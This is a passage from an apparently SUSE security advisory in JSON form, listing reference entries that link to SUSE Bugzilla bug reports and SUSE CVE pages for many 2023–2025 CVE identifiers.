"url": "https://bugzilla.suse.com/1255346"
},
{
"category": "self",
"summary": "SUSE Bug 1255377",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "self",
"summary": "SUSE Bug 1255401",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "self",
"summary": "SUSE Bug 1255403",
"url": "https://bugzilla.suse.com/1255403"
},
{
"category": "self",
"summary": "SUSE Bug 1255417",
"url": "https://bugzilla.suse.com/1255417"
},
{
"category": "self",
"summary": "SUSE Bug 1255482",
"url": "https://bugzilla.suse.com/1255482"
},
{
"category": "self",
"summary": "SUSE Bug 1255488",
"url": "https://bugzilla.suse.com/1255488"
},
{
"category": "self",
"summary": "SUSE Bug 1255537",
"url": "https://bugzilla.suse.com/1255537"
},
{
"category": "self",
"summary": "SUSE Bug 1255539",
"url": "https://bugzilla.suse.com/1255539"
},
{
"category": "self",
"summary": "SUSE Bug 1255544",
"url": "https://bugzilla.suse.com/1255544"
},
{
"category": "self",
"summary": "SUSE Bug 1255547",
"url": "https://bugzilla.suse.com/1255547"
},
{
"category": "self",
"summary": "SUSE Bug 1255548",
"url": "https://bugzilla.suse.com/1255548"
},
{
"category": "self",
"summary": "SUSE Bug 1255552",
"url": "https://bugzilla.suse.com/1255552"
},
{
"category": "self",
"summary": "SUSE Bug 1255568",
"url": "https://bugzilla.suse.com/1255568"
},
{
"category": "self",
"summary": "SUSE Bug 1255569",
"url": "https://bugzilla.suse.com/1255569"
},
{
"category": "self",
"summary": "SUSE Bug 1255615",
"url": "https://bugzilla.suse.com/1255615"
},
{
"category": "self",
"summary": "SUSE Bug 1255622",
"url": "https://bugzilla.suse.com/1255622"
},
{
"category": "self",
"summary": "SUSE Bug 1255695",
"url": "https://bugzilla.suse.com/1255695"
},
{
"category": "self",
"summary": "SUSE Bug 1255930",
"url": "https://bugzilla.suse.com/1255930"
},
{
"category": "self",
"summary": "SUSE Bug 1256280",
"url": "https://bugzilla.suse.com/1256280"
},
{
"category": "self",
"summary": "SUSE Bug 1256528",
"url": "https://bugzilla.suse.com/1256528"
},
{
"category": "self",
"summary": "SUSE Bug 1256568",
"url": "https://bugzilla.suse.com/1256568"
},
{
"category": "self",
"summary": "SUSE Bug 1256579",
"url": "https://bugzilla.suse.com/1256579"
},
{
"category": "self",
"summary": "SUSE Bug 1256582",
"url": "https://bugzilla.suse.com/1256582"
},
{
"category": "self",
"summary": "SUSE Bug 1256584",
"url": "https://bugzilla.suse.com/1256584"
},
{
"category": "self",
"summary": "SUSE Bug 1256586",
"url": "https://bugzilla.suse.com/1256586"
},
{
"category": "self",
"summary": "SUSE Bug 1256591",
"url": "https://bugzilla.suse.com/1256591"
},
{
"category": "self",
"summary": "SUSE Bug 1256592",
"url": "https://bugzilla.suse.com/1256592"
},
{
"category": "self",
"summary": "SUSE Bug 1256593",
"url": "https://bugzilla.suse.com/1256593"
},
{
"category": "self",
"summary": "SUSE Bug 1256594",
"url": "https://bugzilla.suse.com/1256594"
},
{
"category": "self",
"summary": "SUSE Bug 1256597",
"url": "https://bugzilla.suse.com/1256597"
},
{
"category": "self",
"summary": "SUSE Bug 1256605",
"url": "https://bugzilla.suse.com/1256605"
},
{
"category": "self",
"summary": "SUSE Bug 1256606",
"url": "https://bugzilla.suse.com/1256606"
},
{
"category": "self",
"summary": "SUSE Bug 1256607",
"url": "https://bugzilla.suse.com/1256607"
},
{
"category": "self",
"summary": "SUSE Bug 1256608",
"url": "https://bugzilla.suse.com/1256608"
},
{
"category": "self",
"summary": "SUSE Bug 1256609",
"url": "https://bugzilla.suse.com/1256609"
},
{
"category": "self",
"summary": "SUSE Bug 1256610",
"url": "https://bugzilla.suse.com/1256610"
},
{
"category": "self",
"summary": "SUSE Bug 1256611",
"url": "https://bugzilla.suse.com/1256611"
},
{
"category": "self",
"summary": "SUSE Bug 1256612",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "self",
"summary": "SUSE Bug 1256613",
"url": "https://bugzilla.suse.com/1256613"
},
{
"category": "self",
"summary": "SUSE Bug 1256616",
"url": "https://bugzilla.suse.com/1256616"
},
{
"category": "self",
"summary": "SUSE Bug 1256617",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "self",
"summary": "SUSE Bug 1256619",
"url": "https://bugzilla.suse.com/1256619"
},
{
"category": "self",
"summary": "SUSE Bug 1256622",
"url": "https://bugzilla.suse.com/1256622"
},
{
"category": "self",
"summary": "SUSE Bug 1256623",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "self",
"summary": "SUSE Bug 1256625",
"url": "https://bugzilla.suse.com/1256625"
},
{
"category": "self",
"summary": "SUSE Bug 1256627",
"url": "https://bugzilla.suse.com/1256627"
},
{
"category": "self",
"summary": "SUSE Bug 1256628",
"url": "https://bugzilla.suse.com/1256628"
},
{
"category": "self",
"summary": "SUSE Bug 1256630",
"url": "https://bugzilla.suse.com/1256630"
},
{
"category": "self",
"summary": "SUSE Bug 1256638",
"url": "https://bugzilla.suse.com/1256638"
},
{
"category": "self",
"summary": "SUSE Bug 1256641",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "self",
"summary": "SUSE Bug 1256645",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "self",
"summary": "SUSE Bug 1256646",
"url": "https://bugzilla.suse.com/1256646"
},
{
"category": "self",
"summary": "SUSE Bug 1256650",
"url": "https://bugzilla.suse.com/1256650"
},
{
"category": "self",
"summary": "SUSE Bug 1256651",
"url": "https://bugzilla.suse.com/1256651"
},
{
"category": "self",
"summary": "SUSE Bug 1256653",
"url": "https://bugzilla.suse.com/1256653"
},
{
"category": "self",
"summary": "SUSE Bug 1256654",
"url": "https://bugzilla.suse.com/1256654"
},
{
"category": "self",
"summary": "SUSE Bug 1256655",
"url": "https://bugzilla.suse.com/1256655"
},
{
"category": "self",
"summary": "SUSE Bug 1256659",
"url": "https://bugzilla.suse.com/1256659"
},
{
"category": "self",
"summary": "SUSE Bug 1256660",
"url": "https://bugzilla.suse.com/1256660"
},
{
"category": "self",
"summary": "SUSE Bug 1256661",
"url": "https://bugzilla.suse.com/1256661"
},
{
"category": "self",
"summary": "SUSE Bug 1256664",
"url": "https://bugzilla.suse.com/1256664"
},
{
"category": "self",
"summary": "SUSE Bug 1256665",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "self",
"summary": "SUSE Bug 1256674",
"url": "https://bugzilla.suse.com/1256674"
},
{
"category": "self",
"summary": "SUSE Bug 1256680",
"url": "https://bugzilla.suse.com/1256680"
},
{
"category": "self",
"summary": "SUSE Bug 1256682",
"url": "https://bugzilla.suse.com/1256682"
},
{
"category": "self",
"summary": "SUSE Bug 1256688",
"url": "https://bugzilla.suse.com/1256688"
},
{
"category": "self",
"summary": "SUSE Bug 1256689",
"url": "https://bugzilla.suse.com/1256689"
},
{
"category": "self",
"summary": "SUSE Bug 1256690",
"url": "https://bugzilla.suse.com/1256690"
},
{
"category": "self",
"summary": "SUSE Bug 1256726",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "self",
"summary": "SUSE Bug 1256728",
"url": "https://bugzilla.suse.com/1256728"
},
{
"category": "self",
"summary": "SUSE Bug 1256730",
"url": "https://bugzilla.suse.com/1256730"
},
{
"category": "self",
"summary": "SUSE Bug 1256733",
"url": "https://bugzilla.suse.com/1256733"
},
{
"category": "self",
"summary": "SUSE Bug 1256737",
"url": "https://bugzilla.suse.com/1256737"
},
{
"category": "self",
"summary": "SUSE Bug 1256741",
"url": "https://bugzilla.suse.com/1256741"
},
{
"category": "self",
"summary": "SUSE Bug 1256742",
"url": "https://bugzilla.suse.com/1256742"
},
{
"category": "self",
"summary": "SUSE Bug 1256744",
"url": "https://bugzilla.suse.com/1256744"
},
{
"category": "self",
"summary": "SUSE Bug 1256748",
"url": "https://bugzilla.suse.com/1256748"
},
{
"category": "self",
"summary": "SUSE Bug 1256749",
"url": "https://bugzilla.suse.com/1256749"
},
{
"category": "self",
"summary": "SUSE Bug 1256752",
"url": "https://bugzilla.suse.com/1256752"
},
{
"category": "self",
"summary": "SUSE Bug 1256754",
"url": "https://bugzilla.suse.com/1256754"
},
{
"category": "self",
"summary": "SUSE Bug 1256756",
"url": "https://bugzilla.suse.com/1256756"
},
{
"category": "self",
"summary": "SUSE Bug 1256757",
"url": "https://bugzilla.suse.com/1256757"
},
{
"category": "self",
"summary": "SUSE Bug 1256759",
"url": "https://bugzilla.suse.com/1256759"
},
{
"category": "self",
"summary": "SUSE Bug 1256760",
"url": "https://bugzilla.suse.com/1256760"
},
{
"category": "self",
"summary": "SUSE Bug 1256761",
"url": "https://bugzilla.suse.com/1256761"
},
{
"category": "self",
"summary": "SUSE Bug 1256763",
"url": "https://bugzilla.suse.com/1256763"
},
{
"category": "self",
"summary": "SUSE Bug 1256770",
"url": "https://bugzilla.suse.com/1256770"
},
{
"category": "self",
"summary": "SUSE Bug 1256773",
"url": "https://bugzilla.suse.com/1256773"
},
{
"category": "self",
"summary": "SUSE Bug 1256774",
"url": "https://bugzilla.suse.com/1256774"
},
{
"category": "self",
"summary": "SUSE Bug 1256777",
"url": "https://bugzilla.suse.com/1256777"
},
{
"category": "self",
"summary": "SUSE Bug 1256779",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "self",
"summary": "SUSE Bug 1256781",
"url": "https://bugzilla.suse.com/1256781"
},
{
"category": "self",
"summary": "SUSE Bug 1256785",
"url": "https://bugzilla.suse.com/1256785"
},
{
"category": "self",
"summary": "SUSE Bug 1256792",
"url": "https://bugzilla.suse.com/1256792"
},
{
"category": "self",
"summary": "SUSE Bug 1256794",
"url": "https://bugzilla.suse.com/1256794"
},
{
"category": "self",
"summary": "SUSE Bug 1256861",
"url": "https://bugzilla.suse.com/1256861"
},
{
"category": "self",
"summary": "SUSE Bug 1256863",
"url": "https://bugzilla.suse.com/1256863"
},
{
"category": "self",
"summary": "SUSE Bug 1257035",
"url": "https://bugzilla.suse.com/1257035"
},
{
"category": "self",
"summary": "SUSE Bug 1257053",
"url": "https://bugzilla.suse.com/1257053"
},
{
"category": "self",
"summary": "SUSE Bug 1257154",
"url": "https://bugzilla.suse.com/1257154"
},
{
"category": "self",
"summary": "SUSE Bug 1257155",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "self",
"summary": "SUSE Bug 1257158",
"url": "https://bugzilla.suse.com/1257158"
},
{
"category": "self",
"summary": "SUSE Bug 1257163",
"url": "https://bugzilla.suse.com/1257163"
},
{
"category": "self",
"summary": "SUSE Bug 1257164",
"url": "https://bugzilla.suse.com/1257164"
},
{
"category": "self",
"summary": "SUSE Bug 1257167",
"url": "https://bugzilla.suse.com/1257167"
},
{
"category": "self",
"summary": "SUSE Bug 1257168",
"url": "https://bugzilla.suse.com/1257168"
},
{
"category": "self",
"summary": "SUSE Bug 1257180",
"url": "https://bugzilla.suse.com/1257180"
},
{
"category": "self",
"summary": "SUSE Bug 1257202",
"url": "https://bugzilla.suse.com/1257202"
},
{
"category": "self",
"summary": "SUSE Bug 1257204",
"url": "https://bugzilla.suse.com/1257204"
},
{
"category": "self",
"summary": "SUSE Bug 1257207",
"url": "https://bugzilla.suse.com/1257207"
},
{
"category": "self",
"summary": "SUSE Bug 1257208",
"url": "https://bugzilla.suse.com/1257208"
},
{
"category": "self",
"summary": "SUSE Bug 1257215",
"url": "https://bugzilla.suse.com/1257215"
},
{
"category": "self",
"summary": "SUSE Bug 1257217",
"url": "https://bugzilla.suse.com/1257217"
},
{
"category": "self",
"summary": "SUSE Bug 1257218",
"url": "https://bugzilla.suse.com/1257218"
},
{
"category": "self",
"summary": "SUSE Bug 1257220",
"url": "https://bugzilla.suse.com/1257220"
},
{
"category": "self",
"summary": "SUSE Bug 1257221",
"url": "https://bugzilla.suse.com/1257221"
},
{
"category": "self",
"summary": "SUSE Bug 1257227",
"url": "https://bugzilla.suse.com/1257227"
},
{
"category": "self",
"summary": "SUSE Bug 1257232",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "self",
"summary": "SUSE Bug 1257234",
"url": "https://bugzilla.suse.com/1257234"
},
{
"category": "self",
"summary": "SUSE Bug 1257236",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "self",
"summary": "SUSE Bug 1257245",
"url": "https://bugzilla.suse.com/1257245"
},
{
"category": "self",
"summary": "SUSE Bug 1257277",
"url": "https://bugzilla.suse.com/1257277"
},
{
"category": "self",
"summary": "SUSE Bug 1257282",
"url": "https://bugzilla.suse.com/1257282"
},
{
"category": "self",
"summary": "SUSE Bug 1257296",
"url": "https://bugzilla.suse.com/1257296"
},
{
"category": "self",
"summary": "SUSE Bug 1257332",
"url": "https://bugzilla.suse.com/1257332"
},
{
"category": "self",
"summary": "SUSE Bug 1257473",
"url": "https://bugzilla.suse.com/1257473"
},
{
"category": "self",
"summary": "SUSE Bug 1257603",
"url": "https://bugzilla.suse.com/1257603"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53714 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53714/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54013 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54013/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-27005 page",
"url": "https://www.suse.com/security/cve/CVE-2024-27005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-42103 page",
"url": "https://www.suse.com/security/cve/CVE-2024-42103/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53070 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53070/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53149 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-56721 page",
"url": "https://www.suse.com/security/cve/CVE-2024-56721/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22047 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22047/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37744 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37744/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37751 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37751/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38209 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38209/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38243 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38243/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38322 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38322/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38539 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38539/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39689 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39689/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39829 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39829/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39836 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39836/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39880 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39880/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39913 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39913/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40106 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40106/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40132 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40136 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40142 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40142/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40166 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40166/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40177 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40177/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40181 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40181/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40202 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40202/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40238 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40238/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40254 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40257 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40259 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40264 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40264/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40328 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40328/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40350 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40350/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40355 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40355/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68171 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68171/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68174 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68174/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68178 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68188 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68188/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68200 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68200/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68215 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68215/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68227 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68227/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68241 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68241/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68245 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68245/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68254 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68256 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68256/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68296 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68296/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68301 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68301/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68320 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68320/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68325 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68325/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68327 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68327/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68337 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68337/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68365 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68365/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68366 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68366/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68367 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68367/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68372 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68372/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68725 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68725/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68727 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68727/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68728 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68728/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68733 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68733/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68764 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68764/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68768 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68768/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68770 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68770/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68771 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68771/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68773 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68773/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68775 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68775/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68776 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68776/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68777 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68777/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68783 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68783/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68788 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68788/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68789 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68789/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68795 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68797 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68797/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68798 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68798/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68800 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68800/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68801 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68801/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68802 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68802/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68803 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68803/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68804 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68804/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68808 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68808/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68814 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68814/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68815 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68815/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68816 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68816/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68819 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68819/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68820 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68820/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71064 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71064/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71066 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71076 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71076/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71077 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71077/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71078 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71078/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71079 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71080 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71080/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71082 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71082/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71083 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71084 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71084/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71086 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71086/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71087 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71087/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71088 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71088/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71089 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71091 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71091/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71093 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71094 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71094/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71095 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71095/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71096 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71096/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71098 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71098/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71099 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71099/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71100 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71100/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71101 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71101/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71108 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71108/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71111 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71111/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71112 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71114 page",
